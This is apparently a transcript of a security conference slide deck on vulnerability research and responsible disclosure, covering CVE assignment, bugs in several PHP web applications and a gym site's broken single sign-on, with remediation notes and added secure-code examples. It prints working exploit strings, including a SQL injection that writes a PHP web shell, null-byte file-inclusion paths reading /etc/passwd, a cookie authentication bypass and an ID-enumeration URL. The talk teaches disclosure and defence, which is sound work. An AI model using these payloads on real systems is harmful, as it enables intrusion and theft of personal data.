    50. 50. What’s a CVE?Common Vulnerabilities & Exposures“A CVE Identifier will give you a standardizedidentifier for any given vulnerability orexposure.” - MITRE CVE FAQOnly for packaged software offeringsIdeally used in a ‘responsible disclosure’ process
    51. 51. What’s a CVE?Common Vulnerabilities & Exposures“A CVE Identifier will give you a standardizedidentifier for any given vulnerability orexposure.” - MITRE CVE FAQOnly for packaged software offeringsIdeally used in a ‘responsible disclosure’ processKeeps issues organized and easy to reference
    52. 52. What’s a CVE?Common Vulnerabilities & Exposures“A CVE Identifier will give you a standardizedidentifier for any given vulnerability orexposure.” - MITRE CVE FAQOnly for packaged software offeringsIdeally used in a ‘responsible disclosure’ processKeeps issues organized and easy to referenceHelps to prevent duplication of vulnerabilities
    53. 53. How Do I Get a CVE?
    54. 54. How Do I Get a CVE?1.Find the vulnerability -- score!
    55. 55. How Do I Get a CVE?1.Find the vulnerability -- score!2.Try and verify with the vendor what you’ve supposedly found: you could be wrong/late.
    56. 56. How Do I Get a CVE?1.Find the vulnerability -- score!2.Try and verify with the vendor what you’ve supposedly found: you could be wrong/late.3.Contact a CVE Numbering Authority (CNA)
    57. 57. How Do I Get a CVE?1.Find the vulnerability -- score!2.Try and verify with the vendor what you’ve supposedly found: you could be wrong/late.3.Contact a CVE Numbering Authority (CNA)4.Ideally the vendor cares and fixes the issue
    58. 58. How Do I Get a CVE?1.Find the vulnerability -- score!2.Try and verify with the vendor what you’ve supposedly found: you could be wrong/late.3.Contact a CVE Numbering Authority (CNA)4.Ideally the vendor cares and fixes the issue5.Release your advisory with the CVE included
    59. 59. How Do I Get a CVE?1.Find the vulnerability -- score!2.Try and verify with the vendor what you’ve supposedly found: you could be wrong/late.3.Contact a CVE Numbering Authority (CNA)4.Ideally the vendor cares and fixes the issue5.Release your advisory with the CVE included6.Provide links of publication back to MITRE
    60. 60. Tale #2 - The Community
    61. 61. Tale #2 - The CommunityScenario: Random PHP applications you findon SourceForge.net & FreshMeat.net
    62. 62. Tale #2 - The CommunityScenario: Random PHP applications you findon SourceForge.net & FreshMeat.netProblem: Not everyone releasing free (as inGNU) or paid (as in $$$) are goodprogrammers -- surprise!
    63. 63. WSN Links SQL Injection
    64. 64. WSN Links SQL InjectionVulnerable CodeDidnʼt copy it down, but basically:‘namecondition’ and ‘namesearch’ $_GET values allow for a SQL injectionwhen unified to bridge existing SQL queries to allow for exploitation
    65. 65. WSN Links SQL InjectionVulnerable CodeDidnʼt copy it down, but basically:‘namecondition’ and ‘namesearch’ $_GET values allow for a SQL injectionwhen unified to bridge existing SQL queries to allow for exploitationExploitsearch.php?namecondition=IS NULL)) UNION ((SELECT "<?phpsystem($_REQUEST[cmd]); ?>" INTO OUTFILE&namesearch=/var/www/exec.php&action=filter&filled=1&whichtype=categories
    66. 66. WSN Links SQL InjectionVulnerable CodeDidnʼt copy it down, but basically:‘namecondition’ and ‘namesearch’ $_GET values allow for a SQL injectionwhen unified to bridge existing SQL queries to allow for exploitationExploitsearch.php?namecondition=IS NULL)) UNION ((SELECT "<?phpsystem($_REQUEST[cmd]); ?>" INTO OUTFILE&namesearch=/var/www/exec.php&action=filter&filled=1&whichtype=categoriesWhy The Code Sucks•Improper sanitization of $_GET inputs within some functions of search•No explicit installation recommendation to prevent FILE privilege•Side Note: foo.php?debug=1 turns on debugging in the default installation
    67. 67. WSN Links Remediation
    68. 68. WSN Links RemediationCVE-2010-4006
    69. 69. WSN Links RemediationCVE-2010-4006Vendor blacklisted ‘UNION’ within searchqueries as a ‘fix’ to the issue
    70. 70. WSN Links RemediationCVE-2010-4006Vendor blacklisted ‘UNION’ within searchqueries as a ‘fix’ to the issueNew version released 3 days after notificationhad occurred
    71. 71. WSN Links RemediationCVE-2010-4006Vendor blacklisted ‘UNION’ within searchqueries as a ‘fix’ to the issueNew version released 3 days after notificationhad occurredIt would be better to actually fix all of the SQLinjection bugs (yes, there are more) rather thanusing a bandage like a UNION blacklist
    72. 72. Pointter CMS Authentication Bypass
    73. 73. Pointter CMS Authentication BypassVulnerable CodeOn all administrative pages:if (!isset($_COOKIE[auser]) or !isset($_COOKIE[apass])) { header("location:index.php");}
    74. 74. Pointter CMS Authentication BypassVulnerable CodeOn all administrative pages:if (!isset($_COOKIE[auser]) or !isset($_COOKIE[apass])) { header("location:index.php");}ExploitSimply create ‘auser’ and ‘apass’ cookies. The contents of the cookies don’timpact the exploitation as there is no verification of contents before ‘using’ thecookies as a valid authentication mechanism.
    75. 75. Pointter CMS Authentication BypassVulnerable CodeOn all administrative pages:if (!isset($_COOKIE[auser]) or !isset($_COOKIE[apass])) { header("location:index.php");}ExploitSimply create ‘auser’ and ‘apass’ cookies. The contents of the cookies don’timpact the exploitation as there is no verification of contents before ‘using’ thecookies as a valid authentication mechanism.Why The Code Sucks•There’s no reason to store a password cookie in the first place•A session cookie should be unique and encrypted•Blank cookies should never be used as a form of authentication
    76. 76. Pointter CMS Remediation
    77. 77. Pointter CMS RemediationCVE-2010-4332 & CVE-2010-4333
    78. 78. Pointter CMS RemediationCVE-2010-4332 & CVE-2010-4333 Two separate products, same vulnerability
    79. 79. Pointter CMS RemediationCVE-2010-4332 & CVE-2010-4333 Two separate products, same vulnerabilityNo updates have been released to fix the issue
    80. 80. Pointter CMS RemediationCVE-2010-4332 & CVE-2010-4333 Two separate products, same vulnerabilityNo updates have been released to fix the issueDisclosure to vendor was met with legal threatsand very funny dialog (you’ll see...)
    81. 81. Pointter CMS RemediationCVE-2010-4332 & CVE-2010-4333 Two separate products, same vulnerabilityNo updates have been released to fix the issueDisclosure to vendor was met with legal threatsand very funny dialog (you’ll see...)Vendor claims that the user should rename theiradmin folder to hide, erm... prevent the issue! =)
    82. 82. The Swiss“Not as docile as you’d expect...” Source: Me; it’s legit
    83. 83. E-Mail Outtakes!
    84. 84. E-Mail Outtakes!“We do not understand why you try tomanipulate the softwares. I am sure that you areaware that it is illegal to do so.”
    85. 85. E-Mail Outtakes!“We do not understand why you try tomanipulate the softwares. I am sure that you areaware that it is illegal to do so.”“...it is not your duty to publish anything relatedabout our softwares as long as we ask for it.”
    86. 86. E-Mail Outtakes!“We do not understand why you try tomanipulate the softwares. I am sure that you areaware that it is illegal to do so.”“...it is not your duty to publish anything relatedabout our softwares as long as we ask for it.”“What you are trying to do, is to find a securityhole and publish it so that everyone can hack asystem. This is the illegal part so be aware ofthis.”
    89. E-Mail Outtakes!, cont.
        “The illegal thing is to publish a security gap to show other people the way how to attack. That is the same as telling someone how to build a bomb.”
        “Of course, it could be made safer and we know how to do it. But we have designed the softwares so that renaming admin folder gives us less work.”
    96. Null-Byte Attack Primer
        PHP uses C functions for filesystem calls, which read a null byte as ‘end of string’
        include("/var/www/" . $_GET['file'] . ".php");
        index.php?file=../../../etc/passwd
          -> include("/var/www/../../../etc/passwd.php");
        index.php?file=../../../etc/passwd%00
          -> include("/var/www/../../../etc/passwd");
    100. Pulse CMS Local File Inclusion
        Vulnerable Code
          $page = $_REQUEST[p];
          switch ($page) {
              case $page:
                  include("includes/" . $page . ".php");
                  break;
          }
        Exploit
          index.php?p=/../../../../../../../../../../../../../../etc/passwd%00
        Why The Code Sucks
          • This method to prevent LFI is easily defeated with magic_quotes_gpc disabled
          • There’s no sanitization or regex used to prevent LFI attacks
          • Null-byte attacks are a problem with PHP (C-based) and need to be considered
    105. Pulse CMS Remediation
        CVE-2010-4330
        Vendor patched the current version immediately and then released a new version a few days later
        Null-byte attacks are a real problem and programmers need to program with them in mind
        File inclusion from a user-controlled variable should be heavily interrogated (regex/sanitization)
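One way to meet that last point, as an added example that is not Pulse CMS’s own code (the page names, the includes/ layout and PHP 7.1+ are assumptions): the requested page name is rejected on a null byte, restricted to a tight character class and checked against an allowlist before any include path is built, so both the null-byte truncation and the traversal shown in the primer fail for more than one reason.

```php
<?php
// Added example (not Pulse CMS code): loading a page from a user-supplied
// name without letting that name shape the include path freely.
// Page names, directory layout and PHP 7.1+ are assumptions.

// Pages this site deliberately ships (constructed for the example).
const ALLOWED_PAGES = ['home', 'about', 'contact', 'blog'];

/**
 * Return the absolute include path for a requested page name, or null if
 * the request is not one of the known pages. The allowlist alone would be
 * sufficient; the earlier checks make the rejection reason explicit.
 */
function resolvePage($requested): ?string
{
    // Arrays (p[]=x) and other non-strings are never valid page names.
    if (!is_string($requested)) {
        return null;
    }
    // A null byte would make the C-level open() stop early; reject it here
    // (PHP 5.3.4+ also refuses such paths, but do not rely on the runtime).
    if (strpos($requested, "\0") !== false) {
        return null;
    }
    // Strict character class: no '/', '\', '.', '%' or anything else unusual.
    if (!preg_match('/^[a-z0-9_-]{1,32}$/', $requested)) {
        return null;
    }
    // Allowlist: only pages we intend to serve are includable at all.
    if (!in_array($requested, ALLOWED_PAGES, true)) {
        return null;
    }
    $base = realpath(__DIR__ . '/includes');
    $path = realpath(__DIR__ . '/includes/' . $requested . '.php');
    // Defence in depth: the resolved file must live inside includes/.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$path = resolvePage($_REQUEST['p'] ?? 'home');
if ($path === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $path;
```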
    108. Tale #3 - SaaS Gone Wrong
        Scenario: You sign up for a gym membership
        Problem: Your gym’s online fitness integration web site has broken Single Sign-On, causing massive PII/PHI leakage
    112. SSO “Bypass”
        Vulnerable Code
          Have no access to company’s site code, but here’s my best guess...
          checkAuthentication($memberid, $gymid) {
              // Implement this later, kthx!
          }
        Exploit
          http://www.example.com/diff/partners/member_activate.aspx?memberid=[memberid_integer]&gymid=[gymid_integer]
        Why The Code Sucks
          • It didn’t require users to ‘sign up’ for some of their data to be available
          • Complete SSO implementation failure
          • No one could have possibly tested/QA’ed this code before it was launched
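As an added example, not the partner site’s actual code (whose design the author could only guess at), one way the stubbed checkAuthentication could be implemented: the gym signs the memberid/gymid pair it hands over with a per-gym secret and an expiry, so the fitness site can tell a genuine handoff from a URL with integers typed into it. Function names, parameter names and the secret are assumptions.

```php
<?php
// Added example, not the gym partner site's code: the gym signs the ids it
// hands to the fitness site with a per-gym secret and a short expiry, and
// the fitness site verifies before treating the request as that member.
// Names, parameters and the secret below are assumptions for illustration.

// Per-gym shared secrets keyed by gymid (constructed; use a secrets store).
const GYM_SECRETS = ['1234' => 'constructed-demo-secret'];

// Gym side: called only for the member logged in at the gym's own site, so a
// valid signature can exist only for that member's id.
function issueHandoff(int $memberId, int $gymId, int $expiresAt, string $secret): array
{
    return [
        'memberid' => (string) $memberId,
        'gymid'    => (string) $gymId,
        'exp'      => (string) $expiresAt,
        'sig'      => hash_hmac('sha256', "$memberId|$gymId|$expiresAt", $secret),
    ];
}
// Fitness-site side: the check the stub on the slide left for "later". True
// only for an unexpired handoff whose HMAC matches the named gym's secret;
// guessing a memberid is not enough to forge one.
function checkAuthentication(array $q, int $now): bool
{
    foreach (['memberid', 'gymid', 'exp', 'sig'] as $key) {
        if (!isset($q[$key]) || !is_string($q[$key])) {
            return false;
        }
    }
    if (!ctype_digit($q['memberid']) || !ctype_digit($q['gymid']) || !ctype_digit($q['exp'])) {
        return false;
    }
    if ((int) $q['exp'] < $now) {
        return false;                         // expired handoff
    }
    $secret = GYM_SECRETS[$q['gymid']] ?? null;
    if ($secret === null) {
        return false;                         // unknown gym
    }
    $expected = hash_hmac('sha256', "{$q['memberid']}|{$q['gymid']}|{$q['exp']}", $secret);
    return hash_equals($expected, $q['sig']); // constant-time compare
}
// Constructed demo: a genuine handoff verifies; one with memberid altered does not.
$now = 1700000000;
$params = issueHandoff(42, 1234, $now + 300, GYM_SECRETS['1234']);
var_dump(checkAuthentication($params, $now));
$params['memberid'] = '43';
var_dump(checkAuthentication($params, $now));
```

The signed handoff is only one building block: the fitness site must still show nothing for a memberid until checkAuthentication succeeds, and bind the resulting session to that member.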
    115. Vulnerability Verification
        Script #1: Out of 10,000 sequential memberid values roughly 2,700 accounts existed in either an activated or unactivated state.
        Script #2: Of the 1,000 memberid values checked, 76 accounts were activated. One user profile had a picture, eight users had listed phone numbers, and at least one user had a medical questionnaire filled out.
    118. Information Being Disclosed
        Unactivated Account: First Name, Last Name, Date of Birth, Gender, and E-Mail Address
        Activated Account: Photo, First Name, Last Name, Date of Birth, Gender, E-Mail Address, Phone Number, Height, Weight, Body Fat %, Timezone, Gym Membership Company, Workout Schedule, and Medical History (blood pressure issues, heart problems, recent surgery, pregnancy, diabetes, etc.)
    123. Remediation
        Contacted CEO (small company) with a report
        Lots of follow-up e-mails with increasing amounts of people (read: lawyers/execs) added
        Consistently reaffirmed my commitment to help and deflected any comments towards me being some kind of nefarious hacker
        Took three weeks after successful contact to have the issue actually fixed...
    125. Customers Notified
        90,000+
    130. But be careful...
        It’s a very thin line between committing a crime and just trying to help a web site with a problem
        Don’t make threats, don’t ‘force their hand’; be respectful, professional, and continuously affirm your desire to protect people and information
        Anyone can be sued at any time for anything in our country -- it doesn’t mean you’re guilty, but you can certainly lose time and money this way
        Let your ethics and common sense lead you...
    135. Generalized Take-Aways
        Do the right thing, consistently, and people won’t have much room to actually threaten you
        Full disclosure to the community helps to keep developers and businesses accountable for the products and services they offer
        Responsible disclosure allows you to make more friends than enemies; most people are really appreciative of your assistance
        Vulnerability research is tediously fun! ;)
    140. My Thoughts...
        Info Sec. is everyone’s responsibility
        Don’t accept an answer of “well, we didn’t build this with security in mind...”
        Ethics and information security are not, in my mind, allowed to be separated
        This isn’t about 1337 ‘sploits. It’s about protecting your business, your friends, your family, and yourself from unethical people
    141. Thanks...
        Jon Oberheide - Duo Security
        Steve Christey - MITRE
        Todd Jarvis - Packet Storm Security
    142. Contact
        E-Mail: mark.stanislav@gmail.com
        Twitter: @markstanislav
        Website: http://www.uncompiled.com